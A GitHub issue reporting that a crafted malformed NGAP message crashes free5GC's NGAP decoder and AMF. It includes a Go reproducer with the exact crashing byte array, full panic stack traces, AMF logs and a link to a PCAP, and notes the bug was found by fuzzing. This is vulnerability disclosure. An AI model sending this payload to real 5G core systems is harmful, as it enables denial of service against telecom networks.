

[New issue](#)[Jump to bottom](#)

[Bugs] A crafted malformed NGAP message can crash AMF and NGAP decoder #402

Open fisherwky opened this issue on Oct 14 · 4 comments

fisherwky commented on Oct 14

Describe the bug

A crafted malformed NGAP message can crash AMF and NGAP decoder

To Reproduce

run the program test.go can reproduce NGAP decoder crash:
fisher@ubuntu:~/free5gc/NFs/amf/internal/ngap\$ cat test.go

```
package main

import (
    ngap "github.com/free5gc/ngap"
    "fmt"
)

func main() {
    data := []byte{0x00, 0x28, 0x00, 0x30, 0x00, 0x30, 0x30, 0x00, 0x12, 0x00, 0x20, 0x37,
        0x37, 0x00, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30,
        0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30,
        0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30}
    _, err := ngap.Decoder(data)
    fmt.Println(err)
}
```

fisher@ubuntu:~/free5gc/NFs/amf/internal/ngap\$ go run test.go

```
panic: runtime error: index out of range [18446744073709551615] with length 29
```

```
goroutine 1 [running]:
```

```
github.com/free5gc/aper.GetBitString(0xc0000181e3, 0x1d, 0x1d, 0x0, 0x0, 0x4f3420, 0x6390c0,
0xc00007e6e0, 0x4b, 0x0)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:54 +0x2b2
github.com/free5gc/aper.GetBitsValue(0xc0000181e3, 0x1d, 0x1d, 0x0, 0x0, 0x0, 0x0, 0x0)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:83 +0x5a
github.com/free5gc/aper.(*perBitData).getBitsValue(0xc00009d140, 0x0, 0xc00009ba2f, 0x0, 0x0)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:117 +0x7a
github.com/free5gc/aper.(*perBitData).parseSemiConstrainedWholeNumber(0xc00009d140, 0x0, 0x1, 0x0,
0x0)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:191 +0x111
github.com/free5gc/aper.(*perBitData).parseNormallySmallNonNegativeWholeNumber(0xc00009d140,
0xc00001c140, 0x36, 0x1)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:204 +0x71
github.com/free5gc/aper.(*perBitData).parseEnumerated(0xc00009d140, 0x4f2b01, 0xc000015098,
0xc0000150a0, 0x1, 0xc0000164e0, 0x22)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:530 +0x168
github.com/free5gc/aper.parseField(0x4f2b60, 0xc000015080, 0x18b, 0xc00009d140, 0x10000, 0x0, 0x0,
0xc000015098, 0xc0000150a0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:727 +0x1a3e
github.com/free5gc/aper.parseField(0x507ca0, 0xc000015080, 0x199, 0xc00009d140, 0x1, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae
github.com/free5gc/aper.parseField(0x4da0c0, 0xc000078200, 0x196, 0xc00009d140, 0x1, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f
github.com/free5gc/aper.parseField(0x538760, 0xc0000781c0, 0x199, 0xc00009d140, 0x10000, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae
github.com/free5gc/aper.parseField(0x4d70c0, 0xc0000100050, 0x196, 0xc000089140, 0x10000, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f
github.com/free5gc/aper.(*perBitData).parseOpenType(0xc00008acd0, 0x4d70c0, 0xc0000100050, 0x196,
0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:668 +0x367
github.com/free5gc/aper.parseField(0x53db00, 0xc0000100010, 0x199, 0xc00008acd0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:805 +0xa99
github.com/free5gc/aper.parseField(0x52abe0, 0xc0000100000, 0x199, 0xc00009ecd0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae
github.com/free5gc/aper.(*perBitData).parseSequenceOf(0xc00009ecd0, 0x4ed800, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:591 +0x347
github.com/free5gc/aper.parseField(0x4ed860, 0xc000000c7e0, 0x197, 0xc00008acd0, 0x0, 0xc0000149b0,
0xc0000149b8, 0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:860 +0x190d
github.com/free5gc/aper.parseField(0x5119a0, 0xc000000c7e0, 0x199, 0xc00009ecd0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae
github.com/free5gc/aper.parseField(0x514e20, 0xc000000c7e0, 0x199, 0xc00009ecd0, 0x10000, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae
github.com/free5gc/aper.parseField(0x4e4480, 0xc000012408, 0x196, 0xc00008acd0, 0x10000, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f
github.com/free5gc/aper.(*perBitData).parseOpenType(0xc00008be90, 0x4e4480, 0xc000012408, 0x196,
```

```

0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:668 +0x367
github.com/free5gc/aper.parseField(0x546a00, 0xc000012390, 0x199, 0xc00008be90, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:805 +0xa99
github.com/free5gc/aper.parseField(0x5236e0, 0xc000012380, 0x199, 0xc00009fe90, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae
github.com/free5gc/aper.parseField(0x4d9c80, 0xc00000c0e8, 0x196, 0xc000064e90, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f
github.com/free5gc/aper.parseField(0x530d60, 0xc00000c0e0, 0x199, 0xc000064e90, 0x10000, 0x0, 0x0,
0xc0000140c0, 0xc0000140c8, 0x0, ...)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:819 +0xd9e
github.com/free5gc/aper.UnmarshalWithParams(0xc00001c0c0, 0x34, 0x34, 0x4da3c0, 0xc00000c0e0,
0x54bdd9, 0x1c, 0x0, 0x0)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:935 +0x1ce
github.com/free5gc/ngap.Decoder(...)
    /home/fisher/go/pkg/mod/github.com/free5gc/ngap@v1.0.6/ngap.go:19
main.main()
    /home/fisher/free5gc/NFs/amf/internal/ngap/test.go:10 +0xd7
exit status 2

```

When AMF receive this NGAP message will also crash

```

fisher@ubuntu:~/free5gc$ sudo ./bin/amf -c ./config/amfcfg.yaml -l ./log/20221014_091505/amf.log -
lc ./log/20221014_091505/free5gc.log
2022-10-14T09:28:34Z [INFO][AMF][CFG] config version [1.0.3]
2022-10-14T09:28:34Z [INFO][AMF][Init] AMF Log level is set to [info] level
2022-10-14T09:28:34Z [INFO][LIB][NAS] set log level : info
2022-10-14T09:28:34Z [INFO][LIB][NAS] set report call : false
2022-10-14T09:28:34Z [INFO][LIB][NGAP] set log level : info
2022-10-14T09:28:34Z [INFO][LIB][NGAP] set report call : false
2022-10-14T09:28:34Z [INFO][LIB][FSM] set log level : info
2022-10-14T09:28:34Z [INFO][LIB][FSM] set report call : false
2022-10-14T09:28:34Z [INFO][LIB][Aper] set log level : info
2022-10-14T09:28:34Z [INFO][LIB][Aper] set report call : false
2022-10-14T09:28:34Z [INFO][AMF][App] amf
2022-10-14T09:28:34Z [INFO][AMF][App] AMF version:
    free5GC version: v3.2.1-13-ge104d46
    build time:      2022-10-14T02:12:30Z
    commit hash:     e839de03
    commit time:     2022-08-25T12:35:10Z
    go version:      go1.14.4 linux/amd64
2022-10-14T09:28:34Z [INFO][AMF][Init] Server started
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env:   export GIN_MODE=release
- using code:  gin.SetMode(gin.ReleaseMode)

[GIN-debug] GET    /namf-callback/v1/          -->
github.com/free5gc/amf/internal/sbi/httpcallback.Index (4 handlers)
[GIN-debug] POST   /namf-callback/v1/smContextStatus/:guti/:pduSessionId -->
github.com/free5gc/amf/internal/sbi/httpcallback.HTTPSmContextStatusNotify (4 handlers)
[GIN-debug] POST   /namf-callback/v1/am-policy/:polAssoId/update -->

```

```
github.com/free5gc/amf/internal/sbi/httpcallback.HTTPAmPolicyControlUpdateNotifyUpdate (4
handlers)
[GIN-debug] POST    /namf-callback/v1/am-policy/:polAssoId/terminate -->
github.com/free5gc/amf/internal/sbi/httpcallback.HTTPAmPolicyControlUpdateNotifyTerminate (4
handlers)
[GIN-debug] POST    /namf-callback/v1/n1-message-notify -->
github.com/free5gc/amf/internal/sbi/httpcallback.HTTPN1MessageNotify (4 handlers)
[GIN-debug] GET     /namf-oam/v1/                --> github.com/free5gc/amf/internal/sbi/oam.Index (4
handlers)
[GIN-debug] GET     /namf-oam/v1/registered-ue-context -->
github.com/free5gc/amf/internal/sbi/oam.HTTPRegisteredUEContext (4 handlers)
[GIN-debug] GET     /namf-oam/v1/registered-ue-context/:supi -->
github.com/free5gc/amf/internal/sbi/oam.HTTPRegisteredUEContext (4 handlers)
[GIN-debug] GET     /namf-comm/v1/                -->
github.com/free5gc/amf/internal/sbi/communication.Index (4 handlers)
[GIN-debug] PUT     /namf-comm/v1/subscriptions/:subscriptionId -->
github.com/free5gc/amf/internal/sbi/communication.HTTPAMFStatusChangeSubscribeModify (4 handlers)
[GIN-debug] DELETE  /namf-comm/v1/subscriptions/:subscriptionId -->
github.com/free5gc/amf/internal/sbi/communication.HTTPAMFStatusChangeUnSubscribe (4 handlers)
[GIN-debug] PUT     /namf-comm/v1/ue-contexts/:ueContextId -->
github.com/free5gc/amf/internal/sbi/communication.HTTPCreateUEContext (4 handlers)
[GIN-debug] POST    /namf-comm/v1/ue-contexts/:ueContextId/assign-ebi -->
github.com/free5gc/amf/internal/sbi/communication.HTTPEBIAssignment (4 handlers)
[GIN-debug] POST    /namf-comm/v1/ue-contexts/:ueContextId/transfer-update -->
github.com/free5gc/amf/internal/sbi/communication.HTTPRegistrationStatusUpdate (4 handlers)
[GIN-debug] POST    /namf-comm/v1/ue-contexts/:ueContextId/release -->
github.com/free5gc/amf/internal/sbi/communication.HTTPReleaseUEContext (4 handlers)
[GIN-debug] POST    /namf-comm/v1/ue-contexts/:ueContextId/transfer -->
github.com/free5gc/amf/internal/sbi/communication.HTTPUEContextTransfer (4 handlers)
[GIN-debug] DELETE  /namf-comm/v1/ue-contexts/:ueContextId/n1-n2-
messages/subscriptions/:subscriptionId -->
github.com/free5gc/amf/internal/sbi/communication.HTTPN1N2MessageUnSubscribe (4 handlers)
[GIN-debug] POST    /namf-comm/v1/ue-contexts/:ueContextId/n1-n2-messages -->
github.com/free5gc/amf/internal/sbi/communication.HTTPN1N2MessageTransfer (4 handlers)
[GIN-debug] GET     /namf-comm/v1/ue-contexts/:ueContextId/n1-n2-messages/:n1N2MessageId -->
github.com/free5gc/amf/internal/sbi/communication.HTTPN1N2MessageTransferStatus (4 handlers)
[GIN-debug] POST    /namf-comm/v1/ue-contexts/:ueContextId/n1-n2-messages/subscriptions -->
github.com/free5gc/amf/internal/sbi/communication.HTTPN1N2MessageSubscribe (4 handlers)
[GIN-debug] DELETE  /namf-comm/v1/non-ue-n2-messages/subscriptions/:n2NotifySubscriptionId -->
github.com/free5gc/amf/internal/sbi/communication.HTTPNonUeN2InfoUnSubscribe (4 handlers)
[GIN-debug] POST    /namf-comm/v1/non-ue-n2-messages/transfer -->
github.com/free5gc/amf/internal/sbi/communication.HTTPNonUeN2MessageTransfer (4 handlers)
[GIN-debug] POST    /namf-comm/v1/non-ue-n2-messages/subscriptions -->
github.com/free5gc/amf/internal/sbi/communication.HTTPNonUeN2InfoSubscribe (4 handlers)
[GIN-debug] POST    /namf-comm/v1/subscriptions -->
github.com/free5gc/amf/internal/sbi/communication.HTTPAMFStatusChangeSubscribe (4 handlers)
[GIN-debug] GET     /namf-evts/v1/                -->
github.com/free5gc/amf/internal/sbi/eventexposure.Index (4 handlers)
[GIN-debug] DELETE  /namf-evts/v1/subscriptions/:subscriptionId -->
github.com/free5gc/amf/internal/sbi/eventexposure.HTTPDeleteSubscription (4 handlers)
[GIN-debug] PATCH   /namf-evts/v1/subscriptions/:subscriptionId -->
github.com/free5gc/amf/internal/sbi/eventexposure.HTTPModifySubscription (4 handlers)
[GIN-debug] POST    /namf-evts/v1/subscriptions -->
github.com/free5gc/amf/internal/sbi/eventexposure.HTTPCreateSubscription (4 handlers)
[GIN-debug] GET     /namf-mt/v1/                  --> github.com/free5gc/amf/internal/sbi/mt.Index (4
handlers)
```

```
[GIN-debug] GET      /namf-mt/v1/ue-contexts/:ueContextId -->
github.com/free5gc/amf/internal/sbi/mt.HTTPProvideDomainSelectionInfo (4 handlers)
[GIN-debug] POST     /namf-mt/v1/ue-contexts/:ueContextId/ue-reachind -->
github.com/free5gc/amf/internal/sbi/mt.HTTPEnableUeReachability (4 handlers)
[GIN-debug] GET      /namf-loc/v1/                        -->
github.com/free5gc/amf/internal/sbi/location.Index (4 handlers)
[GIN-debug] POST     /namf-loc/v1/:ueContextId/provide-loc-info -->
github.com/free5gc/amf/internal/sbi/location.HTTPProvideLocationInfo (4 handlers)
[GIN-debug] POST     /namf-loc/v1/:ueContextId/provide-pos-info -->
github.com/free5gc/amf/internal/sbi/location.HTTPProvidePositioningInfo (4 handlers)
2022-10-14T09:28:34Z [INFO][AMF][Util] amfconfig Info: Version[1.0.3] Description[AMF initial
local configuration]
2022-10-14T09:28:34Z [INFO][AMF][NGAP] Listen on 192.168.56.102:38412
2022-10-14T09:28:39Z [INFO][AMF][NGAP] [AMF] SCTP Accept from:
192.168.56.104/10.0.2.15/10.60.0.1/172.17.0.1:60710
2022-10-14T09:28:39Z [INFO][AMF][NGAP] Create a new NG connection for:
192.168.56.104/10.0.2.15/10.60.0.1/172.17.0.1:60710
panic: runtime error: index out of range [18446744073709551615] with length 29

goroutine 15 [running]:
github.com/free5gc/aper.GetBitString(0xc0003d7e23, 0x1d, 0x1d, 0x0, 0x0, 0xcef9e0, 0x16a0560,
0xc000029b80, 0x4b, 0x0)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:54 +0x2b2
github.com/free5gc/aper.GetBitsValue(0xc0003d7e23, 0x1d, 0x1d, 0x0, 0x0, 0x0, 0x0, 0x0)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:83 +0x5a
github.com/free5gc/aper.(*perBitData).getBitsValue(0xc000474f48, 0x0, 0xc000473837, 0x0, 0x0)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:117 +0x7a
github.com/free5gc/aper.(*perBitData).parseSemiConstrainedWholeNumber(0xc000474f48, 0x0, 0x1, 0x0,
0x0)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:191 +0x111
github.com/free5gc/aper.(*perBitData).parseNormallySmallNonNegativeWholeNumber(0xc000474f48,
0xc000452300, 0x36, 0x1)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:204 +0x71
github.com/free5gc/aper.(*perBitData).parseEnumerated(0xc000474f48, 0xcecf01, 0xc0004271e8,
0xc0004271f0, 0x1, 0xc00047a030, 0x22)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:530 +0x168
github.com/free5gc/aper.parseField(0xcecf20, 0xc0004271d0, 0x18b, 0xc000474f48, 0x10000, 0x0, 0x0,
0xc0004271e8, 0xc0004271f0, 0x0, ...)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:727 +0x1a3e
github.com/free5gc/aper.parseField(0xd5b980, 0xc0004271d0, 0x199, 0xc000474f48, 0x1, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae
github.com/free5gc/aper.parseField(0xcadd80, 0xc0003dda80, 0x196, 0xc000474f48, 0x1, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f
github.com/free5gc/aper.parseField(0xe0ec0, 0xc0003dda40, 0x199, 0xc000474f48, 0x10000, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae
github.com/free5gc/aper.parseField(0xcaad80, 0xc000480050, 0x196, 0xc0000a8f48, 0x10000, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f
github.com/free5gc/aper.(*perBitData).parseOpenType(0xc0000aaad8, 0xcaad80, 0xc000480050, 0x196,
0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...)
    /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:668 +0x367
github.com/free5gc/aper.parseField(0xe25140, 0xc000480010, 0x199, 0xc0000aaad8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
```

```

/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:805 +0xa99
github.com/free5gc/aper.parseField(0xdb7600, 0xc000480000, 0x199, 0xc000476ad8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae
github.com/free5gc/aper.(*perBitData).parseSequenceOf(0xc000476ad8, 0xcd9a00, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:591 +0x347
github.com/free5gc/aper.parseField(0xcd9a60, 0xc0003f9020, 0x197, 0xc0000aaad8, 0x0, 0xc000426af0,
0xc000426af8, 0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:860 +0x190d
github.com/free5gc/aper.parseField(0xd65680, 0xc0003f9020, 0x199, 0xc000476ad8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae
github.com/free5gc/aper.parseField(0xd68b00, 0xc0003f9020, 0x199, 0xc000476ad8, 0x10000, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae
github.com/free5gc/aper.parseField(0xcb8140, 0xc0000e5208, 0x196, 0xc0000aaad8, 0x10000, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f
github.com/free5gc/aper.(*perBitData).parseOpenType(0xc0000abc98, 0xcb8140, 0xc0000e5208, 0x196,
0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:668 +0x367
github.com/free5gc/aper.parseField(0xe60ce0, 0xc0000e5190, 0x199, 0xc0000abc98, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:805 +0xa99
github.com/free5gc/aper.parseField(0xdb0100, 0xc0000e5180, 0x199, 0xc000477c98, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae
github.com/free5gc/aper.parseField(0xcad940, 0xc0003f8928, 0x196, 0xc00040bc98, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f
github.com/free5gc/aper.parseField(0xddb1c0, 0xc0003f8920, 0x199, 0xc00040bc98, 0x10000, 0x0, 0x0,
0xc000426210, 0xc000426218, 0x0, ...)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:819 +0xd9e
github.com/free5gc/aper.UnmarshalWithParams(0xc000454000, 0x34, 0x2000, 0xcae080, 0xc0003f8920,
0xe882ed, 0x1c, 0xc0002f8ce0, 0x6)
/home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:935 +0x1ce
github.com/free5gc/ngap.Decoder(...)
/home/fisher/go/pkg/mod/github.com/free5gc/ngap@v1.0.6/ngap.go:19
github.com/free5gc/amf/internal/ngap.Dispatch(0x1000660, 0xc0004231f0, 0xc000454000, 0x34, 0x2000)
/home/fisher/free5gc/NFs/amf/internal/ngap/dispatcher.go:30 +0x11a
github.com/free5gc/amf/internal/ngap/service.handleConnection(0xc0004231f0, 0x2000, 0xeaf6d8,
0xeaf6e0)
/home/fisher/free5gc/NFs/amf/internal/ngap/service/service.go:204 +0x700
created by github.com/free5gc/amf/internal/ngap/service.listenAndServe
/home/fisher/free5gc/NFs/amf/internal/ngap/service/service.go:136 +0xc43

```

Expected behavior

No crash of AMF and NGAP decoder

Environment (please complete the following information):

- free5GC Version: v3.2.1-13-ge104d46
- OS: Ubuntu 20.04 Server
- Kernel version: 5.4.0-91-generic
- go version: go1.14.4 linux/amd64
- c compiler version (Option): gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0

PCAP File

https://raw.githubusercontent.com/fisherwky/shared/main/crafted_malformed_ngap_message_make_amf_crash.pcap

CallmeprofessorD... commented 23 days ago

Hi,
May I ask how this loophole was dug?

fisherwky commented 23 days ago

Author

Hi, May I ask how this loophole was dug?
by fuzzing

CallmeprofessorD... commented 16 days ago

Hi, May I ask how this loophole was dug?
by fuzzing

Are open source tools used? If so, please tell me what it is. Thank you very much.

fisherwky commented 12 days ago

Author

Hi, May I ask how this loophole was dug?
by fuzzing

Are open source tools used? If so, please tell me what it is. Thank you very much.

<https://go.dev/security/fuzz/>

--g---

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

No branches or pull requests

2 participants

